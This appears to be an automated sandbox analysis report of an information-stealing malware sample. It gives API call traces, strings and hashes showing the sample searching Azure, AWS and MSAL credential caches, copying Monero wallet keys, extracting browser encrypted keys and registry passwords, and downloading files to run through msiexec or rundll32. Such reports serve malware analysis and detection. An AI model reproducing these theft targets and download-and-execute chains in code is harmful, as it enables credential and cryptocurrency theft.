                                          • Snapshot File: hcaresult_0_2_e90000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                          • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                                          • API String ID: 949356159-974132213
                                          • Opcode ID: 6534b1b3c12c2ac09ff5dcc27dd8164927d5c55d4e35af9fd8ab11f3d5bf8f51
                                          • Instruction ID: 8f694e8d47dea86087c9034a1010e361ecc6de81e1738a035318ffdd3a769b8d
                                          • Opcode Fuzzy Hash: 6534b1b3c12c2ac09ff5dcc27dd8164927d5c55d4e35af9fd8ab11f3d5bf8f51
                                          • Instruction Fuzzy Hash: 534194BAA4030867CB64F760EC57FEE3378AB65700F405894B585760C1EEB567C9CB92
                                          Function 00EA9010 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 184COMMON
                                          Download Yara Rule
                                          APIs
                                          • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00EA906C
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2176067098.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                          • Associated: 00000000.00000002.2176049629.0000000000E90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000126F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000134A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001371000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001378000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001387000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176611925.0000000001388000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176742102.0000000001520000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176758538.0000000001521000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e90000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CreateGlobalStream
                                          • String ID: image/jpeg
                                          • API String ID: 2244384528-3785015651
                                          • Opcode ID: 445d9058713dfd5f3ef362ec6a54d06fe0eaa80494b06d793f2c9d6b839bb11e
                                          • Instruction ID: 300ca566efd0ae643afc2c99a1398fc034b57c43970d9829f89da50506f36603
                                          • Opcode Fuzzy Hash: 445d9058713dfd5f3ef362ec6a54d06fe0eaa80494b06d793f2c9d6b839bb11e
                                          • Instruction Fuzzy Hash: FE71DF75A10208EBDB14DFE4D989FEEB7B9BF4C700F108508F955AB284DB79A905CB60
                                          Function 00EA2E30 Relevance: 19.7, APIs: 3, Strings: 8, Instructions: 469COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00EAA740: lstrcpy.KERNEL32(00EB0E17,00000000), ref: 00EAA788
                                          • ShellExecuteEx.SHELL32(0000003C), ref: 00EA31C5
                                          • ShellExecuteEx.SHELL32(0000003C), ref: 00EA335D
                                          • ShellExecuteEx.SHELL32(0000003C), ref: 00EA34EA
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2176067098.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                          • Associated: 00000000.00000002.2176049629.0000000000E90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000126F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000134A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001371000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001378000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001387000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176611925.0000000001388000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176742102.0000000001520000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176758538.0000000001521000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e90000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ExecuteShell$lstrcpy
                                          • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                                          • API String ID: 2507796910-3625054190
                                          • Opcode ID: 92a1b0dfa8ed13b321c40c3f208561db569c592d4388f4ff894d33110698f8fc
                                          • Instruction ID: 5ab9ac8846a8c08a47990d739bc8b203d2479e2a0513e81dcd93ec3813753c48
                                          • Opcode Fuzzy Hash: 92a1b0dfa8ed13b321c40c3f208561db569c592d4388f4ff894d33110698f8fc
                                          • Instruction Fuzzy Hash: 19122F719002089ADB59EFA0DC96FEEB7B8AF59300F445169F5067A091EF343B4ACF61
                                          Function 00EA52C0 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 139stringCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00EAA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00EAA7E6
                                            • Part of subcall function 00E96280: InternetOpenA.WININET(00EB0DFE,00000001,00000000,00000000,00000000), ref: 00E962E1
                                            • Part of subcall function 00E96280: StrCmpCA.SHLWAPI(?,00BBFCF0), ref: 00E96303
                                            • Part of subcall function 00E96280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00E96335
                                            • Part of subcall function 00E96280: HttpOpenRequestA.WININET(00000000,GET,?,00BBF278,00000000,00000000,00400100,00000000), ref: 00E96385
                                            • Part of subcall function 00E96280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00E963BF
                                            • Part of subcall function 00E96280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00E963D1
                                            • Part of subcall function 00EAA8A0: lstrcpy.KERNEL32(?,00EB0E17), ref: 00EAA905
                                          • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00EA5318
                                          • lstrlen.KERNEL32(00000000), ref: 00EA532F
                                            • Part of subcall function 00EA8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00EA8E52
                                          • StrStrA.SHLWAPI(00000000,00000000), ref: 00EA5364
                                          • lstrlen.KERNEL32(00000000), ref: 00EA5383
                                          • lstrlen.KERNEL32(00000000), ref: 00EA53AE
                                            • Part of subcall function 00EAA740: lstrcpy.KERNEL32(00EB0E17,00000000), ref: 00EAA788
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2176067098.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                          • Associated: 00000000.00000002.2176049629.0000000000E90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000126F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000134A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001371000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001378000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001387000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176611925.0000000001388000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176742102.0000000001520000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176758538.0000000001521000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e90000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                                          • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                                          • API String ID: 3240024479-1526165396
                                          • Opcode ID: cd52197dbe0cc4e4577b49ba92b521003e6c3e86f41ace33beefca9db683a4cf
                                          • Instruction ID: 72a71025c38c6434a771e5e3beaf8cbb1a6c7cc5c85c339773bcacc94c00fb93
                                          • Opcode Fuzzy Hash: cd52197dbe0cc4e4577b49ba92b521003e6c3e86f41ace33beefca9db683a4cf
                                          • Instruction Fuzzy Hash: 3F511C319102089BCB58FF60C996AEE77B8AF1A301F555028F8077E191DF387B45CBA2
                                          Function 00EA12D0 Relevance: 16.8, APIs: 11, Instructions: 310COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2176067098.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                          • Associated: 00000000.00000002.2176049629.0000000000E90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000126F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000134A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001371000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001378000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001387000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176611925.0000000001388000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176742102.0000000001520000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176758538.0000000001521000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e90000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcpylstrlen
                                          • String ID:
                                          • API String ID: 2001356338-0
                                          • Opcode ID: eafd3ba3ffa53dae67d53f66851101842d85128436e8f5334b663f0a1f3f0c72
                                          • Instruction ID: c02c6826da0fd3de97278d16cb887dd7aaf3d6010eb54eea365896c6768ff544
                                          • Opcode Fuzzy Hash: eafd3ba3ffa53dae67d53f66851101842d85128436e8f5334b663f0a1f3f0c72
                                          • Instruction Fuzzy Hash: 81C1A4B5A002099BCB14EF60DC89FEA73B8BB59304F0455D8F50ABB141EB35BA85CF91
                                          Function 00EA4280 Relevance: 16.7, APIs: 11, Instructions: 204stringCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00EA8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00EA8E0B
                                          • lstrcat.KERNEL32(?,00000000), ref: 00EA42EC
                                          • lstrcat.KERNEL32(?,00BBF608), ref: 00EA430B
                                          • lstrcat.KERNEL32(?,?), ref: 00EA431F
                                          • lstrcat.KERNEL32(?,00BBDEE0), ref: 00EA4333
                                            • Part of subcall function 00EAA740: lstrcpy.KERNEL32(00EB0E17,00000000), ref: 00EAA788
                                            • Part of subcall function 00EA8D90: GetFileAttributesA.KERNEL32(00000000,?,00E91B54,?,?,00EB564C,?,?,00EB0E1F), ref: 00EA8D9F
                                            • Part of subcall function 00E99CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00E99D39
                                            • Part of subcall function 00E999C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00E999EC
                                            • Part of subcall function 00E999C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00E99A11
                                            • Part of subcall function 00E999C0: LocalAlloc.KERNEL32(00000040,?), ref: 00E99A31
                                            • Part of subcall function 00E999C0: ReadFile.KERNEL32(000000FF,?,00000000,00E9148F,00000000), ref: 00E99A5A
                                            • Part of subcall function 00E999C0: LocalFree.KERNEL32(00E9148F), ref: 00E99A90
                                            • Part of subcall function 00E999C0: CloseHandle.KERNEL32(000000FF), ref: 00E99A9A
                                            • Part of subcall function 00EA93C0: GlobalAlloc.KERNEL32(00000000,00EA43DD,00EA43DD), ref: 00EA93D3
                                          • StrStrA.SHLWAPI(?,00BBF788), ref: 00EA43F3
                                          • GlobalFree.KERNEL32(?), ref: 00EA4512
                                            • Part of subcall function 00E99AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N,00000000,00000000), ref: 00E99AEF
                                            • Part of subcall function 00E99AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00E94EEE,00000000,?), ref: 00E99B01
                                            • Part of subcall function 00E99AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N,00000000,00000000), ref: 00E99B2A
                                            • Part of subcall function 00E99AC0: LocalFree.KERNEL32(?,?,?,?,00E94EEE,00000000,?), ref: 00E99B3F
                                          • lstrcat.KERNEL32(?,00000000), ref: 00EA44A3
                                          • StrCmpCA.SHLWAPI(?,00EB08D1), ref: 00EA44C0
                                          • lstrcat.KERNEL32(00000000,00000000), ref: 00EA44D2
                                          • lstrcat.KERNEL32(00000000,?), ref: 00EA44E5
                                          • lstrcat.KERNEL32(00000000,00EB0FB8), ref: 00EA44F4
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2176067098.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                          • Associated: 00000000.00000002.2176049629.0000000000E90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000126F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000134A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001371000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001378000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001387000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176611925.0000000001388000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176742102.0000000001520000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176758538.0000000001521000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e90000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                          • String ID:
                                          • API String ID: 3541710228-0
                                          • Opcode ID: d2de239f4ea5d91751d5e2beaadefe97e65cfbf33b8c148508d1b012c4aff37a
                                          • Instruction ID: 88f16d77bf0290e8249e01abe63488fa15dbbe57f3d910e29f4754754a9c6e84
                                          • Opcode Fuzzy Hash: d2de239f4ea5d91751d5e2beaadefe97e65cfbf33b8c148508d1b012c4aff37a
                                          • Instruction Fuzzy Hash: E4714AB6E00208A7CB14EBE4DC46FEE73B9AB8D300F045598F505A7185EB75EB45CB51
                                          Function 00E91310 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 141stringfileCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00E912A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00E912B4
                                            • Part of subcall function 00E912A0: RtlAllocateHeap.NTDLL(00000000), ref: 00E912BB
                                            • Part of subcall function 00E912A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00E912D7
                                            • Part of subcall function 00E912A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00E912F5
                                            • Part of subcall function 00E912A0: RegCloseKey.ADVAPI32(?), ref: 00E912FF
                                          • lstrcat.KERNEL32(?,00000000), ref: 00E9134F
                                          • lstrlen.KERNEL32(?), ref: 00E9135C
                                          • lstrcat.KERNEL32(?,.keys), ref: 00E91377
                                            • Part of subcall function 00EAA740: lstrcpy.KERNEL32(00EB0E17,00000000), ref: 00EAA788
                                            • Part of subcall function 00EAA9B0: lstrlen.KERNEL32(?,00BB8938,?,\Monero\wallet.keys,00EB0E17), ref: 00EAA9C5
                                            • Part of subcall function 00EAA9B0: lstrcpy.KERNEL32(00000000), ref: 00EAAA04
                                            • Part of subcall function 00EAA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00EAAA12
                                            • Part of subcall function 00EAA8A0: lstrcpy.KERNEL32(?,00EB0E17), ref: 00EAA905
                                            • Part of subcall function 00EA8B60: GetSystemTime.KERNEL32(00EB0E1A,00BBEF20,00EB05AE,?,?,00E913F9,?,0000001A,00EB0E1A,00000000,?,00BB8938,?,\Monero\wallet.keys,00EB0E17), ref: 00EA8B86
                                            • Part of subcall function 00EAA920: lstrcpy.KERNEL32(00000000,?), ref: 00EAA972
                                            • Part of subcall function 00EAA920: lstrcat.KERNEL32(00000000), ref: 00EAA982
                                          • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00E91465
                                            • Part of subcall function 00EAA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00EAA7E6
                                            • Part of subcall function 00E999C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00E999EC
                                            • Part of subcall function 00E999C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00E99A11
                                            • Part of subcall function 00E999C0: LocalAlloc.KERNEL32(00000040,?), ref: 00E99A31
                                            • Part of subcall function 00E999C0: ReadFile.KERNEL32(000000FF,?,00000000,00E9148F,00000000), ref: 00E99A5A
                                            • Part of subcall function 00E999C0: LocalFree.KERNEL32(00E9148F), ref: 00E99A90
                                            • Part of subcall function 00E999C0: CloseHandle.KERNEL32(000000FF), ref: 00E99A9A
                                          • DeleteFileA.KERNEL32(00000000), ref: 00E914EF
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2176067098.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                          • Associated: 00000000.00000002.2176049629.0000000000E90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000126F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000134A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001371000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001378000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001387000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176611925.0000000001388000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176742102.0000000001520000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176758538.0000000001521000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e90000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                                          • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                                          • API String ID: 3478931302-218353709
                                          • Opcode ID: e1769148ce559a93aa790dd6b0d68420c7af2cc000cf7c377e62cad13e9284ce
                                          • Instruction ID: 7c66e8415135674d910a4e44a33ad7ab567f9f76a0328108db7d5499c1690e60
                                          • Opcode Fuzzy Hash: e1769148ce559a93aa790dd6b0d68420c7af2cc000cf7c377e62cad13e9284ce
                                          • Instruction Fuzzy Hash: 485187B1D0021997CB54FB60DC96BEE73BCAF54300F4451E8B60A76082EF346B45CBA5
                                          Function 00E975D0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91stringCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00E972D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00E9733A
                                            • Part of subcall function 00E972D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00E973B1
                                            • Part of subcall function 00E972D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00E9740D
                                            • Part of subcall function 00E972D0: GetProcessHeap.KERNEL32(00000000,?), ref: 00E97452
                                            • Part of subcall function 00E972D0: HeapFree.KERNEL32(00000000), ref: 00E97459
                                          • lstrcat.KERNEL32(00000000,00EB17FC), ref: 00E97606
                                          • lstrcat.KERNEL32(00000000,00000000), ref: 00E97648
                                          • lstrcat.KERNEL32(00000000, : ), ref: 00E9765A
                                          • lstrcat.KERNEL32(00000000,00000000), ref: 00E9768F
                                          • lstrcat.KERNEL32(00000000,00EB1804), ref: 00E976A0
                                          • lstrcat.KERNEL32(00000000,00000000), ref: 00E976D3
                                          • lstrcat.KERNEL32(00000000,00EB1808), ref: 00E976ED
                                          • task.LIBCPMTD ref: 00E976FB
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2176067098.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                          • Associated: 00000000.00000002.2176049629.0000000000E90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000126F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000134A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001371000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001378000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001387000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176611925.0000000001388000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176742102.0000000001520000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176758538.0000000001521000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e90000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                                          • String ID: :
                                          • API String ID: 2677904052-3653984579
                                          • Opcode ID: 95ab1ccaa1cf62f09900f4b91feeba1774562ba60825eaaf6a667f00503ba142
                                          • Instruction ID: 833ad9436689d0983466838f06ad33ee62bbecfb7ea587f5f2e8658ec6520108
                                          • Opcode Fuzzy Hash: 95ab1ccaa1cf62f09900f4b91feeba1774562ba60825eaaf6a667f00503ba142
                                          • Instruction Fuzzy Hash: 5831A372A01109DFCF18EBB4DC5ADFF73B4BB48301B205058F942B7295CA39A946CB50
                                          Function 00E960A0 Relevance: 13.6, APIs: 9, Instructions: 133networkfileCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00EAA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00EAA7E6
                                            • Part of subcall function 00E947B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00E94839
                                            • Part of subcall function 00E947B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00E94849
                                          • InternetOpenA.WININET(00EB0DF7,00000001,00000000,00000000,00000000), ref: 00E9610F
                                          • StrCmpCA.SHLWAPI(?,00BBFCF0), ref: 00E96147
                                          • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 00E9618F
                                          • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00E961B3
                                          • InternetReadFile.WININET(?,?,00000400,?), ref: 00E961DC
                                          • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00E9620A
                                          • CloseHandle.KERNEL32(?,?,00000400), ref: 00E96249
                                          • InternetCloseHandle.WININET(?), ref: 00E96253
                                          • InternetCloseHandle.WININET(00000000), ref: 00E96260
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2176067098.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                          • Associated: 00000000.00000002.2176049629.0000000000E90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000126F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000134A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001371000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001378000.00000040.00000001.01000000.00000003.sdmpDownload File
